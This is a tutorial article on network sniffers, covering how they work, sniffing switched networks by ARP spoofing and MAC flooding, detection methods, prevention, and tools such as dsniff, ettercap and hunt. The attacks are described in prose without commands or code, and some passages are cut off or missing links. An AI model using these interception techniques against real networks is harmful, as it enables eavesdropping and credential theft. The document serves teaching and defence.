Sniffer technique

 

Preface

This is the first version of my article titled “Sniffers Basics and Detection”. we have tried to explain in a very simple way what Sniffers are, how they work, methods of detecting sniffers, various sniffing tools and finally how to protect against sniffers. The reason I wrote this document was the fact when we started trying out sniffers, there was not a single document that covered this topic comprehensively.

 

 

Introduction

 

A sniffer is a program or a device that eavesdrops on the network traffic by grabbing information traveling over a network. Sniffers basically are "Data Interception" technology. They work because the Ethernet was built around a

principle of sharing. Most networks use broadcast technology wherein messages for one computer can be read by another computer on that network. In practice, all the other computers except the one for which the message is meant, will ignore that message. However, computers can be made to accept messages even if they are not meant for them. This is done by means of a Sniffer! Many people assume computers connected to a switch are safe from sniffing. Nothing could be further from the truth. Computers connected to switches are just as vulnerable to sniffing as those connected to a hub. This article seeks to explore the topic of sniffers, how they work, detecting and protecting your assets against the malicious use of these programs. Finally, towards the end we will talk about some commonly available sniffers.

 

How a Sniffer Works

 

A computer connected to the LAN has two addresses. One is the MAC (Media Access Control) address that uniquely identifies each node in a network and is stored on the network card itself. It is the MAC address that gets used by the Ethernet protocol while building “frames” to transfer data to and from a machine. The other is the IP address, which is used by applications. The Data Link Layer uses an Ethernet header with the MAC address of the destination machine rather than the IP Address. The Network Layer is responsible for mapping IP network addresses to the MAC address as required by the Data Link Protocol. It initially looks up the MAC address of the destination machine in a table, usually called the ARP (Address Resolution Protocol) cache. If no entry is found for the IP address, the Address Resolution Protocol broadcasts a request packet (ARP request) to all machines on the network. The machine with that address responds to the source machine with its MAC address. This MAC address then gets added to the source machine’s ARP Cache. The source machine in all its communications with the destination machine then uses this MAC address.

 

1) In common industry usage, a sniffer (with lower case "s") is a program that monitors and analyzes network traffic, detecting bottlenecks and problems. Using this information, a network manager can keep traffic flowing efficiently.

A sniffer can also be used legitimately or illegitimately to capture data being transmitted on a network. A network router reads every packet of data passed to it, determining whether it is intended for a destination within the router's own network or whether it should be passed further along the Internet. A router with a sniffer, however, may be able to read the data in the packet as well as the source and destination addresses. Sniffers are often used on academic networks to prevent traffic bottlenecks caused by file-sharing applications.

The term "sniffer" is occasionally used for a program that analyzes data other than network traffic. For example, a database could be analyzed for certain kinds of duplication.

2) Sniffer (with a capital "S") is a trademark owned by NetScout. The generic term may have originated from Sniffer, which is said to be the first packet capture and decode software that was offered for the purpose of network analysis and troubleshooting.

 

There are two basic types of Ethernet environments and how sniffers work in both these cases is slightly different.

 • Shared Ethernet:

 In a shared Ethernet environment, all hosts are connected to the same bus and compete with one another for bandwidth. In such an environment packets meant for one machine are received by all the other machines. Thus when a machine Venus (Comp 1) wants to talk to Cupid (Comp 2) in such an environment, it sends a packet on the network with the destination MAC address of Cupid along with its own source MAC address. All the computers on the shared Ethernet (Comp 3 and Comp 4) compare frame's destination MAC address with their own. If the two don't match, the frame is quietly discarded. A machine running a sniffer breaks this rule and accepts all frames. Such a machine is said to have been put into promiscuous mode and can effectively listen to all the traffic on the network. Sniffing in a Shared Ethernet environment is totally passive and hence extremely difficult to detect. 

 

-Switched Ethernet:

 An Ethernet environment in which the hosts are connected to switch instead of a hub is called a Switched Ethernet. The switch maintains a table keeping track of each computer's MAC address and the physical port on the switch to which that MAC address is connected and delivers packets destined for a particular machine correspondingly. The switch is an intelligent device that sends packets to the destined computer only and does not broadcast it to all the machines on the network, as in the previous case. This results in better utilization of the available bandwidth and improved security. Hence the process followed earlier, of putting the machine into promiscuous mode, to gather packets does not work. As a result of this,  even many experienced Systems Administrators fall into the belief that switched networks are totally secure and immune to sniffing. Sadly, this is not really true.

 

Though a switch is more secure than a hub, the following methods can still be used to sniff on a switch:

1. ARP Spoofing: We have explained earlier how ARP is used to obtain the MAC

address of the destination machine with which we wish to communicate. The ARP

is stateless, you can send an ARP reply even if one has not been asked for and

such a reply will be accepted. Ideally when you want to sniff the traffic originating

from machine Venus, you can ARP Spoof the gateway of the network. The ARP

cache of Venus will now have a wrong entry for the gateway and is said to be

poisoned. This way all the traffic destined for the gateway will pass through your

machine. Another trick that can be used is to poison a hosts ARP cache by setting

the gateway's MAC address to FF:FF:FF:FF:FF:FF (also known as the broadcast

MAC). An excellent tool for this is the arpspoof utility that comes with the dsniff suite. Using arpspoof to poison the ARP cache of a machine

MAC Flooding:

Switches keep a translation table that maps various MAC

addresses to the physical ports on the switch. As a result of this it can intelligently

route packets from one host to another. The switch has a limited memory for this

work. MAC flooding makes use of this limitation to bombard the switch with fake

MAC addresses till the switch can't keep up. The switch then enters into what is

known as a “failopen mode” wherein it starts acting as a hub by broadcasting

packets to all the machines on the network. Once that happens sniffing can be

performed easily. MAC flooding can be performed by using macof, a utility that

comes with dsniff suite.

 

Detecting Sniffers

 

A sniffer is usually passive, it just collects data. Hence it becomes extremely difficult to detect sniffers, especially when running on a Shared Ethernet. But it is slightly easier when the sniffer is functioning on a Switched Ethernet network segment. When installed on a computer, a sniffer does generate some small amount of traffic. Here is an overview of the detection methods:

 

• Ping Method: The trick used here is to send a ping request with the IP address of the suspect machine but not its MAC address. Ideally nobody should see this packet as each Ethernet Adapter will reject it as it does not match its MAC address. But if the suspect machine is running a sniffer it will respond, as it does not bother rejecting packets with a different Destination MAC address. This is an old method and not reliable any longer.

• ARP Method: A machine caches ARPs. So what we do is send a non-broadcast ARP. A machine in promiscuous mode will cache your ARP address. Next we send a broadcast ping packet with our IP, but a different MAC address. Only a machine that has our correct MAC address from the sniffed ARP frame will be able to respond to our broadcast ping request. Voila!

• On Local Host: Often after your machine has been compromised, hackers will leave sniffers, to compromise other machines. On a local machine run ifconfig. On a clean machine the output. Latency Method: This method is based on the assumption that most sniffers do some parsing. Very simply put, in this method, huge amount of data is sent on the network and the suspect machine is pinged before and during the data flooding. If the machine is in promiscuous mode, it will parse the data, increasing the load on it. Therefore it will take extra time to respond to the ping packet. This difference in response times can be used as an indicator of whether a machine is in promiscuous mode or not. A point worth noting is

that the packets may be delayed because of the load on the wire, resulting in false positives.

• ARP Watch: As described earlier, one method to sniff on a switched network is to ARP spoof the gateway. A utility called arpwatch can be used to monitor the ARP cache of a machine to see if there is duplication for a machine. If there is, it could trigger alarms and lead to detection of sniffers. Unfortunately on network implementing DHCP, this could trigger many false alarms. A simple change that can be made is the increase the DHCP lease time. This way even after your users come back after the weekend break, they will get the same IP address as before and the chance of a false alarm is greatly reduced.

• Using IDS: Certain Intrusion Detection Systems, monitor for ARP Spoofing on the network. The Open Source IDS Snort for instance has an arp-spoof preprocessor that allows it to record packets on the network with spoofed ARP addresses. Typically it compares the IP/MAC pairing it is given in the snort.conf file, against the pairing in the packet flowing across the network. Whenever there is a mismatch, it generates an alert.

 

  To be honest, it is not easy to detect sniffers. Often you have to depend on intuition to realize you have a sniffer running. If your network performance suddenly takes a hit, it is possible someone has caused the switch to go into the failopen mode or if users suddenly claim that their passwords have been changed with out their knowledge, you can suspect a sniffer on the network.

 

Preventing Sniffing

The best way to secure yourself against sniffing is to use encryption. While this won't prevent a sniffer from functioning, it will ensure that what a sniffer reads is pure junk.

If you are on a Switched network, the chances are that arp spoofing will be used for sniffing purposes. The machine that the malicious user will most probably try to arp-spoof is the gateway.

To prevent this from happening, you can add the MAC address of the gateway permanently to your ARP cache. This can be done by placing the MAC address of your gateway and other important machines in the /etc/ethers file.

 

Sniffing Tools

Since I have been a Linux man through out, I will list some of the commonly available sniffers for Linux.

• tcpdump: The granddaddy of packet sniffers. Ships by default on many Linux distros! It captures the headers of packets that match a Boolean expression. The captured packed data can be saved to a file for later analysis. Available at:

• sniffit: Robust packet sniffer with good filtering. Available at:

• ethereal: A free network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. Captured data can be browsed via a GUI. Available for both Unix and Windows at:

• hunt: According to Pavel Krauz, the main goal of the HUNT project is to develop tool for exploiting well known weaknesses in the TCP/IP protocol suite. Well I think he comes pretty close to it. An added advantage of using hunt is that it allows you to hijack active connections and take over their control. As far as I know, no other sniffer allows you to do that. Available at:

• ettercap: Ettercap is a sniffer specifically designed for switched LANs. It allows you to

perform man-in-the-middle attacks against SSH and SSL. It has password collector for

telnet, ftp, POP, rlogin, ssh1, icq, smb, mysql, http, NNTP, X11, napster, IRC, rip, bgp,

socks 5, IMAP4, VNC, LDAP, NFS etc. Available at:

http://ettercap.sourceforg dsniff: I won't say much about dsniff except point you to an article by Kurt Seifried titled

``The End of SSL and SSH''. As Mark Joseph Edwards puts in an article, ``Dsniff is the

Swiss army knife of privacy invasion''. The package ships with a handful of nasties: urlsnarf (to keep track of websites your network users are visiting), msgsnarf (to keep track of the instant messenger sessions of users on your LAN), mailsnarf (to keep track of the mails that users of your network are receiving), webspy (to follow a users web-surfing in real time), dsniff (to capture user passwords for quite a few protocols), filesnarf (to capture NFS files), sshmitm (to launch a man-in-the-middle attack against SSH) etc. In my opinion it is one of the most comprehensive sniffer packages available anywhere. It can wreck havoc when used for illegitimate purposes, but it is a valuable tool in hands of a capable systems administrator. Available at:

• lcrzoex: It is a network toolbox for administrators that supports spoofing, sniffing, client

and server creation. Over 400 possible examples are included in the package. This is

another incredible package that I feel every systems administrator should try out. It is

under active development and the author (Laurent Constantin) is a very friendly and an

amazingly helpful person.

 

Often one or more of these programs need to be used in conjunction, to get results. Often on a switched LAN, you will first use arpspoof (which comes with Dsniff) along with hunt (in case you are planning to hijack the session) or maybe with lcrzoex (in case you are planning to capture the data to a file for later analysis). Ideally, a systems administrator should try all these packages and finally use whatever he is comfortable with.